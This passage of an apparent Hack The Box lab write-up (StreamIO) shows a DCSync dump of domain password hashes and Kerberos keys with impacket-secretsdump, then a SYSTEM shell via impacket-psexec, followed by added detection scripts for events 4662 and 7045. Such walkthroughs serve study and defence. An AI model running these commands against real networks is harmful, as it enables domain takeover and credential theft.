DCSync Attack


The administrator credential obtained by abusing the ReadLAPSPassword privilege has been validated. Since the administrator account holds the directory replication rights needed for DCSync, I can use it to dump the entire domain's credentials with impacket-secretsdump:

┌──(kali㉿kali)-[~/archive/htb/labs/streamio]
└─$ KRB5CCNAME=administrator@dc.streamio.htb.ccache impacket-secretsdump streamio.htb/@dc.streamio.htb -no-pass -k -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] target system bootkey: 0x4dbf07084a530cfa7ab417236bd4a647
[*] dumping local sam hashes (uid:rid:lmhash:nthash)
administrator:500:aad3b435b51404eeaad3b435b51404ee:6a559f691b75bff16a07ecbd12e3bdfb:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
defaultaccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
streamio\dc$:plain_password_hex:37ed1c56c56cdd221cb0ddffb91994f512bada6e267addf34b56cc0dab23d0a8bdd3d3ceca8b6f6bdd15063d343043044121f902fb30dbf42c70da71ec05d7b656f384f7bfbedae35cdce0b46b3e367be311d3824827b7c208f56027345c31076bc8be714751d5b0f5a149e900169bb54f9607822c0e351a1834f8b31ef9595690b7167a2c1237fc18f5c7fff36088413745b639062ae39669dda8ad458c1c4b52ab4e346debad306d6fbdc629db6bad7f91bd5a9725980ed8f7e34fc02c0b1df0ff2024637f15d339acfaaf391e9144f65d60bd8841c7c04beb472b074b7470cc396dcf09423ecd0bdb414b9ccf80c9
streamio\dc$:aad3b435b51404eeaad3b435b51404ee:2e6c84140f7b3588f04b1e5f9a3737b3:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xd8b78bca07d4bce21bce1ae04bf231978c84407f
dpapi_userkey:0x9b682d0f5f9b63c03827113581bc2dc4f993e3ee
[*] NL$KM 
 0000   a5 68 6c 6f 0f d6 72 8f  9e de a2 27 47 d1 73 3a   .hlo..r....'g.s:
 0010   EA FB 23 4A 58 C9 04 91  95 A2 E7 3C 63 1A E8 B1   ..#JX......<c...
 0020   DA D8 C8 95 DD 09 23 97  A5 5A 21 74 17 17 CC C6   ......#..Z!t....
 0030   5E 1B F7 BE 34 99 DC 39  D1 72 7B 3E 19 B6 B2 3C   ^...4..9.r{>...<
nl$km:a5686c6f0fd6728f9edea22747d1733aeafb234a58c9049195a2e73c631ae8b1dad8c895dd092397a55a21741717ccc65e1bf7be3499dc39d1727b3e19b6b23c
[*] dumping domain credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
administrator:500:aad3b435b51404eeaad3b435b51404ee:9f946b799913b6314553790f5c314496:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5f5142aae3cce656285ce4504605dec1:::
jdgodd:1104:aad3b435b51404eeaad3b435b51404ee:8846130392c4169cb552fe5b73b046af:::
martin:1105:aad3b435b51404eeaad3b435b51404ee:a9347432fb0034dd1814ca794793d377:::
nikk37:1106:aad3b435b51404eeaad3b435b51404ee:17a54d09dd09920420a6cb9b78534764:::
yoshihide:1107:aad3b435b51404eeaad3b435b51404ee:6d21f46be3697ba16b6edef7b3399bf4:::
dc$:1000:aad3b435b51404eeaad3b435b51404ee:2e6c84140f7b3588f04b1e5f9a3737b3:::
[*] Kerberos keys grabbed
administrator:aes256-cts-hmac-sha1-96:d2c8874a503366044996ed177fbeb03025aec56edfa096349c0360f1395b5562
administrator:aes128-cts-hmac-sha1-96:1163ca485f82e2291eccd9ba72ad30e3
administrator:des-cbc-md5:3d3e9eba254652c7
krbtgt:aes256-cts-hmac-sha1-96:668ee76d84bf5ea1e845933ace27ecde98b736f218c0830cbe71e18812166cda
krbtgt:aes128-cts-hmac-sha1-96:f91f8540a9aca4af627959d1cb888f13
krbtgt:des-cbc-md5:d032029279fbc4fd
jdgodd:aes256-cts-hmac-sha1-96:53fcc54b04d560253b0fdb259b9de0da8c5c65916d12b5e4b5dd4723d9003443
jdgodd:aes128-cts-hmac-sha1-96:22e9e5268e40d1fc8198415fdd6c64bd
jdgodd:des-cbc-md5:76d0fe1a231934e5
martin:aes256-cts-hmac-sha1-96:d5eed6cafcabd393a2101f4fadc143344c48ebaacb065490510ef608424065f0
martin:aes128-cts-hmac-sha1-96:0a0cff37d02d1299a24fe58debb20392
martin:des-cbc-md5:570bfd51e9f7e3bf
nikk37:aes256-cts-hmac-sha1-96:d4a44efe5740231cad3da85c294b01678840ac7a5b6207f366c36fc3c5b59347
nikk37:aes128-cts-hmac-sha1-96:eaff7bb14b5c41f80e5216cb09e16435
nikk37:des-cbc-md5:ae5ddf8fc2853e67
yoshihide:aes256-cts-hmac-sha1-96:0849b8c4eaee4edeaed2972752529251bbb616e9f24e08992923b4f18e9d73b0
yoshihide:aes128-cts-hmac-sha1-96:d668308ea96ebda1d31e3bb77b8e6768
yoshihide:des-cbc-md5:3bae5257ea029d61
dc$:aes256-cts-hmac-sha1-96:9872eef676a44be33d7e08fc77153ab88ab94982ad273d09352f642077da1207
dc$:aes128-cts-hmac-sha1-96:58a31d63174ca1f447ce5279bbe634bd
dc$:des-cbc-md5:a7155b26c48afd0d
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Domain Level Compromise
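An added defender-side example, not from the original writeup: the DCSync above is visible on the domain controller as Security event 4662, where the requesting principal exercises the directory replication control-access rights. The script below flags such requests when the subject is not a known domain controller account; the sample events and the DC allow-list are constructed for this page.

```python
"""Flag DCSync-style replication requests in Security event 4662 records.

Constructed sample events, not real logs from the lab host."""
from __future__ import annotations
import json

# Control-access-right GUIDs that grant directory replication (DCSync needs the first two).
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Computer accounts expected to replicate (assumption: only dc$ exists in this lab domain).
KNOWN_DC_ACCOUNTS = {"STREAMIO\\DC$"}

# Constructed 4662 records in JSON-lines form (field names follow the 4662 XML schema).
SAMPLE_EVENTS = """\
{"EventID":4662,"SubjectDomainName":"STREAMIO","SubjectUserName":"DC$","AccessMask":"0x100","Properties":"{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}
{"EventID":4662,"SubjectDomainName":"STREAMIO","SubjectUserName":"Administrator","AccessMask":"0x100","Properties":"{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}
{"EventID":4662,"SubjectDomainName":"STREAMIO","SubjectUserName":"martin","AccessMask":"0x20","Properties":"{bf967a86-0de6-11d0-a285-00aa003049e2}"}
{"EventID":4624,"SubjectDomainName":"STREAMIO","SubjectUserName":"nikk37"}
"""

def replication_rights(properties: str) -> list[str]:
    """Return the names of replication rights present in a 4662 Properties field."""
    guids = [g.strip("{}").lower() for g in properties.split()]
    return [REPLICATION_GUIDS[g] for g in guids if g in REPLICATION_GUIDS]

def detect_dcsync(events_jsonl: str) -> list[dict]:
    """Return alerts for 4662 events where a non-DC principal requested replication rights."""
    alerts = []
    for line in events_jsonl.splitlines():
        ev = json.loads(line)
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights(ev.get("Properties", ""))
        if not rights:
            continue
        subject = f"{ev['SubjectDomainName']}\\{ev['SubjectUserName']}".upper()
        if subject in KNOWN_DC_ACCOUNTS:
            continue  # routine DC-to-DC replication, not an alert
        alerts.append({"subject": subject, "rights": rights})
    return alerts

if __name__ == "__main__":
    for a in detect_dcsync(SAMPLE_EVENTS):
        print(f"DCSync candidate: {a['subject']} requested {', '.join(a['rights'])}")
```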

Shell Drop


┌──(kali㉿kali)-[~/archive/htb/labs/streamio]
└─$ KRB5CCNAME=administrator@dc.streamio.htb.ccache impacket-psexec streamio.htb/@dc.streamio.htb -no-pass -k -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Requesting shares on dc.streamio.htb.....
[*] Found writable share ADMIN$
[*] Uploading file AFkUXUGh.exe
[*] Opening SVCManager on dc.streamio.htb.....
[*] Creating service CgNB on dc.streamio.htb.....
[*] Starting service CgNB.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2928]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system
 
C:\Windows\system32> hostname
DC
 
C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::243
   IPv6 Address. . . . . . . . . . . : dead:beef::59b8:1082:6853:8e9
   Link-local IPv6 Address . . . . . : fe80::59b8:1082:6853:8e9%12
   IPv4 Address. . . . . . . . . . . : 10.10.11.158
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%12
                                       10.10.10.2

System Level Compromise
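An added detection example, not from the original writeup: the psexec step above leaves a System event 7045 on the DC for the randomly named service (CgNB) whose binary (AFkUXUGh.exe) was written through ADMIN$ into the Windows directory. The script below scores constructed 7045 records against that pattern; the record field names and the sample services are assumptions for this page.

```python
"""Flag psexec-style remote service installs in System event 7045 records.

Constructed sample records, not real logs from the lab host."""
from __future__ import annotations
import re

# impacket-psexec uploads a randomly named .exe through the ADMIN$ share (which
# maps to %SystemRoot%) and registers it under a short random service name,
# the AFkUXUGh.exe / CgNB pattern seen in the session above.
RANDOM_SERVICE_NAME = re.compile(r"^[A-Za-z]{4,8}$")
# A service binary sitting directly in the Windows directory, not in a subfolder.
BINARY_IN_SYSTEMROOT = re.compile(
    r"^(%SystemRoot%|C:\\Windows)\\[^\\]+\.exe$", re.IGNORECASE)

# Constructed 7045 records (field names follow the 7045 event schema).
SAMPLE_7045 = [
    {"ServiceName": "CgNB", "ImagePath": "%SystemRoot%\\AFkUXUGh.exe",
     "StartType": "demand start", "AccountName": "LocalSystem"},
    {"ServiceName": "Spooler", "ImagePath": "%SystemRoot%\\System32\\spoolsv.exe",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"ServiceName": "BackupAgent", "ImagePath": "C:\\Program Files\\Backup\\agent.exe",
     "StartType": "auto start", "AccountName": "LocalSystem"},
]

def psexec_indicators(ev: dict) -> list[str]:
    """Return the indicators a single 7045 record matches (empty list = benign)."""
    hits = []
    if RANDOM_SERVICE_NAME.match(ev.get("ServiceName", "")):
        hits.append("short-random-service-name")
    if BINARY_IN_SYSTEMROOT.match(ev.get("ImagePath", "")):
        hits.append("binary-dropped-in-systemroot")
    if ev.get("StartType", "").lower() == "demand start":
        hits.append("demand-start")
    if ev.get("AccountName") == "LocalSystem":
        hits.append("runs-as-system")
    return hits

def flag_psexec_services(events: list[dict], min_hits: int = 3) -> list[str]:
    """Return the service names that match at least min_hits indicators."""
    return [ev["ServiceName"] for ev in events
            if len(psexec_indicators(ev)) >= min_hits]

if __name__ == "__main__":
    for name in flag_psexec_services(SAMPLE_7045):
        print(f"possible psexec service install: {name}")
```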